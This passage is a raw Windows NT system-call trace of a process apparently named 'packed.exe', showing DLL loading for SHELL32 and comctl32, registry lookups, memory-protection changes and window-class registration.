) }, ... -2147481452, ) == 0x0 01974 896 NtQueryValueKey (-2147481452, (-2147481452, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01975 896 NtClose (-2147481452, ... ) == 0x0 01976 896 NtClose (-2147481368, ... ) == 0x0 01966 896 NtQueryDefaultUILanguage ... ) == 0x0 01977 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\SHELL32.dll"}, 1, 96, ... 164, {status=0x0, info=1}, ) }, 1, 96, ... 164, {status=0x0, info=1}, ) == 0x0 01978 896 NtCreateSection (0x4, 0x0, 0x0, 2, 134217728, 164, ... 168, ) == 0x0 01979 896 NtMapViewOfSection (168, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0xd30000), 0x0, 8462336, ) == 0x0 01980 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\SHELL32.dll.124.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01981 896 NtQueryDefaultLocale (1, 1233908, ... ) == 0x0 01982 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\SHELL32.dll.124.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01983 896 NtRequestWaitReplyPort (24, {128, 156, new_msg, 0, 2088850039, 1234944, 1179817, 1234668} (24, {128, 156, new_msg, 0, 2088850039, 1234944, 1179817, 1234668} "\210\6!\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6!\1\244\0\0\0\377\377\377\377\0\0\0\0@ \366\0\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6!\1\0\0\0\0\0\0\0\0\364\333\22\0\0\0\0\0" ... {128, 156, reply, 0, 1252, 896, 82399, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6!\1\244\0\0\0\377\377\377\377\0\0\0\0@ \366\0\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6!\1\0\0\0\0\0\0\0\0\364\333\22\0\0\0\0\0" ) ... {128, 156, reply, 0, 1252, 896, 82399, 0} (24, {128, 156, new_msg, 0, 2088850039, 1234944, 1179817, 1234668} "\210\6!\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6!\1\244\0\0\0\377\377\377\377\0\0\0\0@ \366\0\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6!\1\0\0\0\0\0\0\0\0\364\333\22\0\0\0\0\0" ... {128, 156, reply, 0, 1252, 896, 82399, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6!\1\244\0\0\0\377\377\377\377\0\0\0\0@ \366\0\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6!\1\0\0\0\0\0\0\0\0\364\333\22\0\0\0\0\0" ) ) == 0x0 01984 896 NtClose (164, ... ) == 0x0 01985 896 NtClose (168, ... ) == 0x0 01986 896 NtUnmapViewOfSection (-1, 0xd30000, ... ) == 0x0 01987 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01988 896 NtOpenKey (0x8, {24, 0, 0x40, 0, 0, (0x8, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01989 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01990 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01991 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local\"}, 1233100, ... ) }, 1233100, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01992 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01993 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01994 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01995 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03"}, 1233164, ... ) }, 1233164, ... ) == 0x0 01996 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03"}, 3, 33, ... 168, {status=0x0, info=1}, ) }, 3, 33, ... 168, {status=0x0, info=1}, ) == 0x0 01997 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01998 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "comctl32.dll"}, ... 164, ) }, ... 164, ) == 0x0 01999 896 NtMapViewOfSection (164, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x5d090000), 0x0, 630784, ) == 0x0 02000 896 NtClose (164, ... ) == 0x0 02001 896 NtProtectVirtualMemory (-1, (0x5d091000), 1656, 4, ... (0x5d091000), 4096, 32, ) == 0x0 02002 896 NtProtectVirtualMemory (-1, (0x5d091000), 4096, 32, ... (0x5d091000), 4096, 4, ) == 0x0 02003 896 NtFlushInstructionCache (-1, 1560875008, 1656, ... ) == 0x0 02004 896 NtProtectVirtualMemory (-1, (0x5d091000), 1656, 4, ... (0x5d091000), 4096, 32, ) == 0x0 02005 896 NtProtectVirtualMemory (-1, (0x5d091000), 4096, 32, ... (0x5d091000), 4096, 4, ) == 0x0 02006 896 NtFlushInstructionCache (-1, 1560875008, 1656, ... ) == 0x0 02007 896 NtProtectVirtualMemory (-1, (0x5d091000), 1656, 4, ... (0x5d091000), 4096, 32, ) == 0x0 02008 896 NtProtectVirtualMemory (-1, (0x5d091000), 4096, 32, ... (0x5d091000), 4096, 4, ) == 0x0 02009 896 NtFlushInstructionCache (-1, 1560875008, 1656, ... ) == 0x0 02010 896 NtProtectVirtualMemory (-1, (0x5d091000), 1656, 4, ... (0x5d091000), 4096, 32, ) == 0x0 02011 896 NtProtectVirtualMemory (-1, (0x5d091000), 4096, 32, ... (0x5d091000), 4096, 4, ) == 0x0 02012 896 NtFlushInstructionCache (-1, 1560875008, 1656, ... ) == 0x0 02013 896 NtProtectVirtualMemory (-1, (0x5d091000), 1656, 4, ... (0x5d091000), 4096, 32, ) == 0x0 02014 896 NtProtectVirtualMemory (-1, (0x5d091000), 4096, 32, ... (0x5d091000), 4096, 4, ) == 0x0 02015 896 NtFlushInstructionCache (-1, 1560875008, 1656, ... ) == 0x0 02016 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\comctl32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02017 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 02018 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 13828096, 65536, ) == 0x0 02019 896 NtAllocateVirtualMemory (-1, 13828096, 0, 4096, 4096, 4, ... 13828096, 4096, ) == 0x0 02020 896 NtAllocateVirtualMemory (-1, 13832192, 0, 8192, 4096, 4, ... 13832192, 8192, ) == 0x0 02021 896 NtAllocateVirtualMemory (-1, 1355776, 0, 4096, 4096, 4, ... 1355776, 4096, ) == 0x0 02022 896 NtAllocateVirtualMemory (-1, 13840384, 0, 4096, 4096, 4, ... 13840384, 4096, ) == 0x0 02023 896 NtAllocateVirtualMemory (-1, 13844480, 0, 4096, 4096, 4, ... 13844480, 4096, ) == 0x0 02024 896 NtQueryDefaultUILanguage (1233940, ... 02025 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 02026 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... -2147481452, ) == 0x0 02027 896 NtQueryInformationToken (-2147481452, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 02028 896 NtClose (-2147481452, ... ) == 0x0 02029 896 NtOpenKey (0x2000000, {24, 0, 0x640, 0, 0, (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... -2147481452, ) }, ... -2147481452, ) == 0x0 02030 896 NtOpenKey (0x80000000, {24, -2147481452, 0x240, 0, 0, (0x80000000, {24, -2147481452, 0x240, 0, 0, "Software\Policies\Microsoft\Control Panel\Desktop"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02031 896 NtOpenKey (0x80000000, {24, -2147481452, 0x640, 0, 0, (0x80000000, {24, -2147481452, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147482684, ) }, ... -2147482684, ) == 0x0 02032 896 NtQueryValueKey (-2147482684, (-2147482684, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02033 896 NtClose (-2147482684, ... ) == 0x0 02034 896 NtClose (-2147481452, ... ) == 0x0 02024 896 NtQueryDefaultUILanguage ... ) == 0x0 02035 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\comctl32.dll"}, 1, 96, ... 164, {status=0x0, info=1}, ) }, 1, 96, ... 164, {status=0x0, info=1}, ) == 0x0 02036 896 NtCreateSection (0x4, 0x0, 0x0, 2, 134217728, 164, ... 172, ) == 0x0 02037 896 NtMapViewOfSection (172, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0xd40000), 0x0, 618496, ) == 0x0 02038 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\comctl32.dll.124.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02039 896 NtQueryDefaultLocale (1, 1232036, ... ) == 0x0 02040 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\comctl32.dll.124.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02041 896 NtRequestWaitReplyPort (24, {128, 156, new_msg, 0, 2088850039, 1233072, 1179817, 1232796} (24, {128, 156, new_msg, 0, 2088850039, 1233072, 1179817, 1232796} "\210\6!\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0@\0D\0\250\6!\1\244\0\0\0\377\377\377\377\0\0\0\0\340q\333\0\0\0\0\0k\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\354\6!\1\0\0\0\0\0\0\0\0\244\324\22\0\0\0\0\0" ... {128, 156, reply, 0, 1252, 896, 82400, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0@\0D\0\250\6!\1\244\0\0\0\377\377\377\377\0\0\0\0\340q\333\0\0\0\0\0k\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\354\6!\1\0\0\0\0\0\0\0\0\244\324\22\0\0\0\0\0" ) ... {128, 156, reply, 0, 1252, 896, 82400, 0} (24, {128, 156, new_msg, 0, 2088850039, 1233072, 1179817, 1232796} "\210\6!\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0@\0D\0\250\6!\1\244\0\0\0\377\377\377\377\0\0\0\0\340q\333\0\0\0\0\0k\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\354\6!\1\0\0\0\0\0\0\0\0\244\324\22\0\0\0\0\0" ... {128, 156, reply, 0, 1252, 896, 82400, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0@\0D\0\250\6!\1\244\0\0\0\377\377\377\377\0\0\0\0\340q\333\0\0\0\0\0k\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\354\6!\1\0\0\0\0\0\0\0\0\244\324\22\0\0\0\0\0" ) ) == 0x0 02042 896 NtClose (164, ... ) == 0x0 02043 896 NtClose (172, ... ) == 0x0 02044 896 NtUnmapViewOfSection (-1, 0xd40000, ... ) == 0x0 02045 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 02046 896 NtOpenProcess (0x400, {24, 0, 0x0, 0, 0, 0x0}, {1252, 0}, ... 172, ) == 0x0 02047 896 NtQueryInformationProcess (172, Session, 4, ... {SessionId=0,}, 0x0, ) == 0x0 02048 896 NtClose (172, ... ) == 0x0 02049 896 NtUserRegisterWindowMessage ( ("ShellGetDragImage", ... ) , ... ) == 0xc03a 02050 896 NtUserSystemParametersInfo (104, 0, 1561338260, 0, ... ) == 0x1 02051 896 NtUserSystemParametersInfo (38, 4, 1561337988, 0, ... ) == 0x1 02052 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 02053 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 172, ) == 0x0 02054 896 NtQueryInformationToken (172, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 02055 896 NtClose (172, ... ) == 0x0 02056 896 NtOpenKey (0x20019, {24, 0, 0x640, 0, 0, (0x20019, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... 172, ) }, ... 172, ) == 0x0 02057 896 NtOpenProcessToken (-1, 0x8, ... 164, ) == 0x0 02058 896 NtAccessCheck (1334208, 164, 0x1, 1235132, 1235184, 56, 1235164, ... ) == STATUS_NO_IMPERSONATION_TOKEN 02059 896 NtClose (164, ... ) == 0x0 02060 896 NtOpenKey (0x20019, {24, 172, 0x40, 0, 0, (0x20019, {24, 172, 0x40, 0, 0, "Control Panel\Desktop"}, ... 164, ) }, ... 164, ) == 0x0 02061 896 NtQueryValueKey (164, (164, "SmoothScroll", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02062 896 NtClose (164, ... ) == 0x0 02063 896 NtUserSystemParametersInfo (41, 500, 1235312, 0, ... ) == 0x1 02064 896 NtUserSystemParametersInfo (102, 0, 1561338280, 0, ... ) == 0x1 02065 896 NtClose (172, ... ) == 0x0 02066 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02067 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c03b 02068 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c03d 02069 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02070 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c03f 02071 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02072 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c041 02073 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02074 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c043 02075 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c045 02076 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02077 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c047 02078 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02079 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c049 02080 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02081 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c04b 02082 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02083 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c04d 02084 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02085 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c04f 02086 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c051 02087 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02088 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c053 02089 896 NtUserFindExistingCursorIcon (1235060, 1235076, 1235124, ... ) == 0x10011 02090 896 NtUserRegisterClassExWOW (1235004, 1235072, 1235088, 1235104, 0, 384, 0, ... ) == 0x8177c055 02091 896 NtUserFindExistingCursorIcon (1235060, 1235076, 1235124, ... ) == 0x10011 02092 896 NtUserRegisterClassExWOW (1235004, 1235072, 1235088, 1235104, 0, 384, 0, ... ) == 0x8177c057 02093 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02094 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c059 02095 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10013 02096 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c05b 02097 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02098 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c05d 02099 896 NtUserFindExistingCursorIcon (1235064, 1235080, 1235128, ... ) == 0x10011 02100 896 NtUserRegisterClassExWOW (1235008, 1235076, 1235092, 1235108, 0, 384, 0, ... ) == 0x8177c05f 02101 896 NtProtectVirtualMemory (-1, (0x7c9c12b0), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02102 896 NtProtectVirtualMemory (-1, (0x7c9c12b0), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02103 896 NtProtectVirtualMemory (-1, (0x7c9c12bc), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02104 896 NtProtectVirtualMemory (-1, (0x7c9c12bc), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02105 896 NtProtectVirtualMemory (-1, (0x7c9c12c4), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02106 896 NtProtectVirtualMemory (-1, (0x7c9c12c4), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02107 896 NtProtectVirtualMemory (-1, (0x7c9c1328), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02108 896 NtProtectVirtualMemory (-1, (0x7c9c1328), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02109 896 NtProtectVirtualMemory (-1, (0x7c9c1348), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02110 896 NtProtectVirtualMemory (-1, (0x7c9c1348), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02111 896 NtProtectVirtualMemory (-1, (0x7c9c13b0), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02112 896 NtProtectVirtualMemory (-1, (0x7c9c13b0), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02113 896 NtProtectVirtualMemory (-1, (0x7c9c13dc), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02114 896 NtProtectVirtualMemory (-1, (0x7c9c13dc), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02115 896 NtProtectVirtualMemory (-1, (0x7c9c13e8), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02116 896 NtProtectVirtualMemory (-1, (0x7c9c13e8), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02117 896 NtProtectVirtualMemory (-1, (0x7c9c140c), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02118 896 NtProtectVirtualMemory (-1, (0x7c9c140c), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02119 896 NtProtectVirtualMemory (-1, (0x7c9c1460), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02120 896 NtProtectVirtualMemory (-1, (0x7c9c1460), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02121 896 NtProtectVirtualMemory (-1, (0x7c9c1464), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02122 896 NtProtectVirtualMemory (-1, (0x7c9c1464), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02123 896 NtProtectVirtualMemory (-1, (0x7c9c1468), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02124 896 NtProtectVirtualMemory (-1, (0x7c9c1468), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02125 896 NtProtectVirtualMemory (-1, (0x7c9c146c), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02126 896 NtProtectVirtualMemory (-1, (0x7c9c146c), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02127 896 NtProtectVirtualMemory (-1, (0x7c9c1470), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02128 896 NtProtectVirtualMemory (-1, (0x7c9c1470), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02129 896 NtProtectVirtualMemory (-1, (0x7c9c14bc), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02130 896 NtProtectVirtualMemory (-1, (0x7c9c14bc), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02131 896 NtProtectVirtualMemory (-1, (0x7c9c14c4), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02132 896 NtProtectVirtualMemory (-1, (0x7c9c14c4), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02133 896 NtProtectVirtualMemory (-1, (0x7c9c14dc), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02134 896 NtProtectVirtualMemory (-1, (0x7c9c14dc), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02135 896 NtProtectVirtualMemory (-1, (0x7c9c14e4), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02136 896 NtProtectVirtualMemory (-1, (0x7c9c14e4), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02137 896 NtProtectVirtualMemory (-1, (0x7c9c14f0), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02138 896 NtProtectVirtualMemory (-1, (0x7c9c14f0), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02139 896 NtProtectVirtualMemory (-1, (0x7c9c1570), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02140 896 NtProtectVirtualMemory (-1, (0x7c9c1570), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02141 896 NtProtectVirtualMemory (-1, (0x7c9c15a0), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02142 896 NtProtectVirtualMemory (-1, (0x7c9c15a0), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02143 896 NtProtectVirtualMemory (-1, (0x7c9c15a4), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02144 896 NtProtectVirtualMemory (-1, (0x7c9c15a4), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02145 896 NtProtectVirtualMemory (-1, (0x7c9c15bc), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02146 896 NtProtectVirtualMemory (-1, (0x7c9c15bc), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02147 896 NtProtectVirtualMemory (-1, (0x7c9c15c8), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02148 896 NtProtectVirtualMemory (-1, (0x7c9c15c8), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02149 896 NtProtectVirtualMemory (-1, (0x7c9c15e4), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02150 896 NtProtectVirtualMemory (-1, (0x7c9c15e4), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02151 896 NtProtectVirtualMemory (-1, (0x7c9c15e8), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02152 896 NtProtectVirtualMemory (-1, (0x7c9c15e8), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02153 896 NtProtectVirtualMemory (-1, (0x7c9c15ec), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02154 896 NtProtectVirtualMemory (-1, (0x7c9c15ec), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02155 896 NtProtectVirtualMemory (-1, (0x7c9c15f0), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02156 896 NtProtectVirtualMemory (-1, (0x7c9c15f0), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02157 896 NtProtectVirtualMemory (-1, (0x7c9c15f4), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02158 896 NtProtectVirtualMemory (-1, (0x7c9c15f4), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02159 896 NtProtectVirtualMemory (-1, (0x7c9c15fc), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02160 896 NtProtectVirtualMemory (-1, (0x7c9c15fc), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02161 896 NtProtectVirtualMemory (-1, (0x7c9c161c), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02162 896 NtProtectVirtualMemory (-1, (0x7c9c161c), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02163 896 NtProtectVirtualMemory (-1, (0x7c9c1620), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02164 896 NtProtectVirtualMemory (-1, (0x7c9c1620), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02165 896 NtProtectVirtualMemory (-1, (0x7c9c163c), 4, 4, ... (0x7c9c1000), 4096, 32, ) == 0x0 02166 896 NtProtectVirtualMemory (-1, (0x7c9c163c), 4, 32, ... (0x7c9c1000), 4096, 4, ) == 0x0 02167 896 NtOpenThreadToken (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN 02168 896 NtCreateSemaphore (0x1f0003, {24, 48, 0x80, 1344112, 0, (0x1f0003, {24, 48, 0x80, 1344112, 0, "shell.{210A4BA0-3AEA-1069-A2D9-08002B30309D}"}, 0, 2147483647, ... 172, ) }, 0, 2147483647, ... 172, ) == STATUS_OBJECT_NAME_EXISTS 02169 896 NtReleaseSemaphore (172, 1, ... 0, ) == 0x0 02170 896 NtWaitForSingleObject (172, 0, {0, 0}, ... ) == 0x0 02171 896 NtCreateKey (0x2000000, {24, 120, 0x40, 0, 0, (0x2000000, {24, 120, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 164, 2, ) }, 0, 0x0, 0, ... 164, 2, ) == 0x0 02172 896 NtQueryValueKey (164, (164, "Cache", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 